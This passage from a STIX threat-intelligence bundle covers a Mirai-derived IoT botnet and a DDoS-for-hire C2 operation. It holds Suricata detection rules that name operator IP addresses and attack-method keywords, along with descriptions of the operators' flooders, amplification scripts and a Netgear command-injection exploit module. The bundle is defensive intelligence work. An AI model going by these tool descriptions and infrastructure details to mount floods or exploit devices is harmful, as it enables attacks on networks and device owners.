variant uses a length byte followed by a string \u2014 this produces a distinctive\n# pattern where the option block starts with a non-zero length byte followed by\n# printable ASCII chars rather than a single control-byte enum value.\n# Detection: TCP/23 flow to CNC IP carrying 4-byte duration + 1-byte method + target table\n# + option block starting with length-prefixed string (heuristic: byte > 0x01 followed by ASCII)\nalert tcp $HOME_NET any -> 165.227.175.161 23 (msg:\"THL - Naku-Pandora Mirai Operator-Bespoke CNC Protocol (Length-Prefixed String Option Keys) - Defeats Stock Mirai IDS Rules - UTA-2026-014\"; flow:to_server,established; dsize:>8; content:\"|00 00|\"; depth:2; offset:0; pcre:\"/^.{4}.[\\x01-\\x14][A-Za-z0-9_]/\"; sid:9001010; rev:1; metadata:affected_product Linux_IoT, attack_target IoT_Device, created_at 2026_05_26, deployment Perimeter, signature_severity High, tag UTA-2026-014;)", "pattern_type": "suricata", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--4bd77b51-b3db-5d34-8a6f-6f2c7e5798fb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.900946Z", "modified": "2026-06-16T16:01:05.900946Z", "name": "THL - Matrix C2 Discord Bot Attack-Method Dispatch - DDoS-as-a-Service Customer Interface - UTA-2026-014", "indicator_types": [ "malicious-activity" ], "pattern": "# Rule 6 \u2014 Discord API egress from server hosts with attack-method dispatch pattern\n# Requires SSL/TLS inspection or HTTP proxy (not applicable to raw encrypted Discord HTTPS)\n# Most useful with proxy/DPI capability or in environments where the Discord bot uses\n# non-HTTPS webhook endpoints (unusual but possible in dev/test deployments)\nalert http $HOME_NET any -> any any (msg:\"THL - Matrix C2 Discord Bot Attack-Method Dispatch - DDoS-as-a-Service Customer Interface - UTA-2026-014\"; http.host; content:\"discord.com\"; http.request_body; content:\"ovh-nuke\"; nocase; sid:9001011; rev:1; metadata:affected_product Discord, attack_target Network, created_at 2026_05_26, deployment Internal, signature_severity High, tag UTA-2026-014;)\n\nalert http $HOME_NET any -> any any (msg:\"THL - Matrix C2 Discord Bot Attack-Method Dispatch syn-storm/frag-storm - UTA-2026-014\"; http.host; content:\"discord.com\"; http.request_body; pcre:\"/(?:syn-storm|frag-storm|udp-bypass|icmp-hell)/i\"; sid:9001012; rev:1; metadata:affected_product Discord, attack_target Network, created_at 2026_05_26, deployment Internal, signature_severity High, tag UTA-2026-014;)", "pattern_type": "suricata", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b85c50c9-5db6-55e8-9fde-73c5581b40d8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.901125Z", "modified": "2026-06-16T16:01:05.901125Z", "name": "THL - TLS Connection to Rovodev Operator IONOS VPS 87.106.143.220 - Pivot on Operator Infrastructure - UTA-2026-014", "indicator_types": [ "malicious-activity" ], "pattern": "# Rule 7 \u2014 JARM/JA4X fingerprint for operator IONOS host 87.106.143.220\n# JARM fingerprint observed at investigation time; may drift with TLS library updates.\n# Deploy as hunting/pivot rule rather than blocking rule.\n# Note: Suricata does not natively match JARM hashes; this requires integration with\n# Zeek JARM script or JA4+ sensor producing JARM metadata as flow metadata.\n# The SID is reserved; actual JARM matching should be implemented via threat intel feeds.\n# For native Suricata, match on destination IP + TLS port as a network-layer pivot.\nalert tls $HOME_NET any -> 87.106.143.220 any (msg:\"THL - TLS Connection to Rovodev Operator IONOS VPS 87.106.143.220 - Pivot on Operator Infrastructure - UTA-2026-014\"; flow:to_server; sid:9001013; rev:1; metadata:affected_product Linux_Server, attack_target Network, created_at 2026_05_26, deployment Perimeter, signature_severity Medium, tag UTA-2026-014;)\n\nalert tls $HOME_NET any -> 87.106.54.213 any (msg:\"THL - TLS Connection to Rovodev Operator IONOS Backup VPS 87.106.54.213 - Pivot on Operator Infrastructure - UTA-2026-014\"; flow:to_server; sid:9001014; rev:1; metadata:affected_product Linux_Server, attack_target Network, created_at 2026_05_26, deployment Perimeter, signature_severity Medium, tag UTA-2026-014;)", "pattern_type": "suricata", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "malware", "spec_version": "2.1", "id": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.901359Z", "modified": "2026-06-16T16:01:05.901359Z", "name": "Pandora-Mirai", "is_family": true, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "malware", "spec_version": "2.1", "id": "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.901518Z", "modified": "2026-06-16T16:01:05.901518Z", "name": "Sora-fork derivative", "is_family": true, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "malware", "spec_version": "2.1", "id": "malware--00325578-54c9-57e3-a535-57db0340d1e6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.901627Z", "modified": "2026-06-16T16:01:05.901627Z", "name": "Mirai canonical", "is_family": true, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "malware", "spec_version": "2.1", "id": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.901729Z", "modified": "2026-06-16T16:01:05.901729Z", "name": "Matrix C2 (operator-built)", "is_family": true, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "malware", "spec_version": "2.1", "id": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.901842Z", "modified": "2026-06-16T16:01:05.901842Z", "name": "", "description": "Naku.arm \u2014 Pandora-Mirai 11-arch IoT botnet bot binary. VT 43/66. Microsoft Mirai.AW!xp. Universal MAL_ELF_LNX_Mirai_Oct10_1 YARA. Operator-bespoke XOR-0x54 string obfuscation + 22-char charset 1gba4cdom53nhp12ei0kfj.", "malware_types": [ "backdoor" ], "is_family": false, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--2bdd9e17-1bc2-5b20-9c9e-400008f89e39", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.903914Z", "modified": "2026-06-16T16:01:05.903914Z", "name": "layer7_ultra.py \u2014 Matrix C2 aiohttp-based L7 flooder with Cloudflare-bypass + cache-bypass + random headers + SSL verification disabled.", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--699024e5-ddbb-5d31-ab4e-824885ce72f2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.904044Z", "modified": "2026-06-16T16:01:05.904044Z", "name": "http_flood.py \u2014 Matrix C2 simple HTTP/HTTPS flooder", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--43a84cf5-99b5-5dbe-a46b-8d8d27ac53cc", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.904162Z", "modified": "2026-06-16T16:01:05.904162Z", "name": "dns_amp.py \u2014 Matrix C2 DNS amplification script. Operator-bug per Hunt: 'Contains indentation/syntax error; does not spoof source IP so resolvers won't amplify effectively' \u2014 sub-pattern #7 Copy-Paste Indentation Decay confirmed.", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--15c54f25-b627-5184-90fe-9842800f2d97", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.904276Z", "modified": "2026-06-16T16:01:05.904276Z", "name": "matrix/exploits/cve_2017_6077.py \u2014 Mass-exploit module for CVE-2017-6077 Netgear DGN1000/DGN2200/DGN3300 command injection. Accounts for Hunt-curated 92-Netgear-devices-exploited count.", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--1cc70a78-f3d6-5865-9865-3a435d95ccf5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.904408Z", "modified": "2026-06-16T16:01:05.904408Z", "name": "matrix/exploits/multi_cve.py \u2014 Multi-CVE exploit module. Targets Netgear", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--12cf3313-c71e-518a-b3e0-09b465a1957a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.90458Z", "modified": "2026-06-16T16:01:05.90458Z", "name": "matrix/amps/memcached_amplifier.py \u2014 UDP/11211 memcached amplification", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--6915be9d-0954-5531-83b3-9fe82df05038", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.904696Z", "modified": "2026-06-16T16:01:05.904696Z", "name": "matrix/amps/ntp_amplifier.py \u2014 UDP/123 NTP monlist amplification with IP source spoofing", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--03be7702-b2db-5525-8ea7-c0fab3e9a166", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.904818Z", "modified": "2026-06-16T16:01:05.904818Z", "name": "matrix/amps/ssdp_amplifier.py \u2014 UDP/1900 SSDP M-SEARCH reflector.", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--4f9b6f95-675f-5f47-86cd-0b0fc145ff10", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.905053Z", "modified": "2026-06-16T16:01:05.905053Z", "name": "matrix/payloads/bot_payload.sh \u2014 additional bot payload variant. Hunt MITRE tags T1016 + T1053.003 + T1082 + T1497.001 + T1543.002 + T1547.013.", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--71b0bc4d-a8fb-5daa-ba54-6ee690701d21", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.905382Z", "modified": "2026-06-16T16:01:05.905382Z", "name": "bot.sh", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--ac7e057e-c3ac-5507-8842-bf16632d42ea", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.905482Z", "modified": "2026-06-16T16:01:05.905482Z", "name": "matrix/proxies/proxy_chain.py \u2014 SOCKS5 proxy chain builder with TOR helpers.", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "tool", "spec_version": "2.1", "id": "tool--cf7a60ed-7084-5e8b-8d1a-e7a519c20e75", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.905597Z", "modified": "2026-06-16T16:01:05.905597Z", "name": "matrix/proxies/socks5_manager.py \u2014 fetches public SOCKS5 lists", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--5b7a06ed-32c6-5260-95a8-8e82d3f41f1f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.906223Z", "modified": "2026-06-16T16:01:05.906223Z", "name": "Acquire Infrastructure: Virtual Private Server", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/003", "external_id": "T1583.003" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dc18c976-0434-597c-bbcd-79a7131f6aca", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.906423Z", "modified": "2026-06-16T16:01:05.906423Z", "name": "Compromise Infrastructure: Server", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/004", "external_id": "T1584.004" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--05023500-1905-50d5-af07-f1896a464314", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.906611Z", "modified": "2026-06-16T16:01:05.906611Z", "name": "Obtain Capabilities: Malware", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/001", "external_id": "T1588.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9800866f-1d8d-5f89-bfaa-67bcfdd6fdb6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.906766Z", "modified": "2026-06-16T16:01:05.906766Z", "name": "Obtain Capabilities: Exploits", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/005", "external_id": "T1588.005" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--87b8e72a-5437-59a8-a6a9-16f846415a26", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.906946Z", "modified": "2026-06-16T16:01:05.906946Z", "name": "Develop Capabilities: Malware", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1587/001", "external_id": "T1587.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6214841b-936d-5da2-b5c8-4bed4cf9aee0", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.907122Z", "modified": "2026-06-16T16:01:05.907122Z", "name": "Exploit Public-Facing Application", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1190", "external_id": "T1190" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4efef37e-c256-5987-a1b8-60d9424c7250", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.907286Z", "modified": "2026-06-16T16:01:05.907286Z", "name": "Default Accounts", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1078/001", "external_id": "T1078.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--770465f6-d1b8-5285-9c27-a5a9569aa97b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.907425Z", "modified": "2026-06-16T16:01:05.907425Z", "name": "External Remote Services", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1133", "external_id": "T1133" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--99faa775-7366-5b35-9527-17f7643bc506", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.907557Z", "modified": "2026-06-16T16:01:05.907557Z", "name": "Python", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/006", "external_id": "T1059.006" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--73364e03-8914-541e-a33c-877b656c37e4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.907675Z", "modified": "2026-06-16T16:01:05.907675Z", "name": "Unix Shell", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/004", "external_id": "T1059.004" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--c1d497a1-fd18-5b75-9bd4-65dcf03ad8e2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.907792Z", "modified": "2026-06-16T16:01:05.907792Z", "name": "JavaScript", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/007", "external_id": "T1059.007" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a42fc6ae-4096-53e5-98d2-02c39a64d42c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.907908Z", "modified": "2026-06-16T16:01:05.907908Z", "name": "Native API", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1106", "external_id": "T1106" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d2f1c4d6-c47e-5a04-a3fd-c736a48f01f1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.908025Z", "modified": "2026-06-16T16:01:05.908025Z", "name": "XDG Autostart Entries", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/013", "external_id": "T1547.013" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ef3ac7d9-a40e-539b-9435-17e7305a5bb8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.908141Z", "modified": "2026-06-16T16:01:05.908141Z", "name": "Systemd Service", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1543/002", "external_id": "T1543.002" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1635f86c-b5b5-5339-b31b-87ce05013408", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.908258Z", "modified": "2026-06-16T16:01:05.908258Z", "name": "Cron", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053/003", "external_id": "T1053.003" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d09ec016-9d07-5880-bbaa-b9dc297f2995", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.908374Z", "modified": "2026-06-16T16:01:05.908374Z", "name": "RC Scripts", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1037/004", "external_id": "T1037.004" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--bef03fde-2eb8-5ba7-96bc-f6fe262d857c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.90849Z", "modified": "2026-06-16T16:01:05.90849Z", "name": "Unix Shell Configuration Modification", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/004", "external_id": "T1546.004" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0e5a3749-a144-57b8-a774-20335f3f0941", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.908614Z", "modified": "2026-06-16T16:01:05.908614Z", "name": "Obfuscated Files or Information", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027", "external_id": "T1027" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--115d7bc5-0c5a-58b6-9a22-417821aa315c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.90873Z", "modified": "2026-06-16T16:01:05.90873Z", "name": "Rootkit", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1014", "external_id": "T1014" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f38353ba-cfac-577c-ac86-5e3f0c5fb314", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.908846Z", "modified": "2026-06-16T16:01:05.908846Z", "name": "Match Legitimate Name or Location", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/004", "external_id": "T1036.004" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3e0f1033-d731-5b8e-8f4c-27484d52e4f0", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.908963Z", "modified": "2026-06-16T16:01:05.908963Z", "name": "System Checks", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1497/001", "external_id": "T1497.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--74662a48-2fba-53a9-8582-008044ccd9d9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.909079Z", "modified": "2026-06-16T16:01:05.909079Z", "name": "Embedded Payloads", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/009", "external_id": "T1027.009" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ae605b9d-aec8-5001-87c6-c60e0a234712", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.909197Z", "modified": "2026-06-16T16:01:05.909197Z", "name": "Hidden Files and Directories", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/001", "external_id": "T1564.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--67cee5b2-7970-5505-949d-f0b9a6c1c4bf", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.909314Z", "modified": "2026-06-16T16:01:05.909314Z", "name": "File Deletion", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/004", "external_id": "T1070.004" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a0baf777-47e7-57bb-a5f8-ffa4f9a1dbe8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.909431Z", "modified": "2026-06-16T16:01:05.909431Z", "name": "System Information Discovery", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1082", "external_id": "T1082" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b12dc527-38bd-5e3a-a077-afa4290df40b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.909547Z", "modified": "2026-06-16T16:01:05.909547Z", "name": "Process Discovery", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1057", "external_id": "T1057" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--fc3ef2f7-136f-551c-b37b-ebe6208fb232", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.909663Z", "modified": "2026-06-16T16:01:05.909663Z", "name": "System Network Configuration Discovery", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1016", "external_id": "T1016" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--adcf66b3-4abb-593f-a779-d41175990400", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.90978Z", "modified": "2026-06-16T16:01:05.90978Z", "name": "Exploitation of Remote Services", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1210", "external_id": "T1210" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e143cf40-c9b0-5118-8096-34d60698c27b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.909896Z", "modified": "2026-06-16T16:01:05.909896Z", "name": "Password Guessing", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1110/001", "external_id": "T1110.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1076c468-8982-548b-9292-726a22f83ecb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910012Z", "modified": "2026-06-16T16:01:05.910012Z", "name": "Credentials in Files", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/001", "external_id": "T1552.001" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d6b8aa8c-cfd9-5f42-a8ac-2573005abb2f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910148Z", "modified": "2026-06-16T16:01:05.910148Z", "name": "Automated Collection", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1119", "external_id": "T1119" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e42939d6-6332-5a6c-8dac-6195c79081bc", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.910267Z", "modified": "2026-06-16T16:01:05.910267Z", "name": "Data from Information Repositories", "external_references": [ { "source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1213", "external_id": "T1213" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": 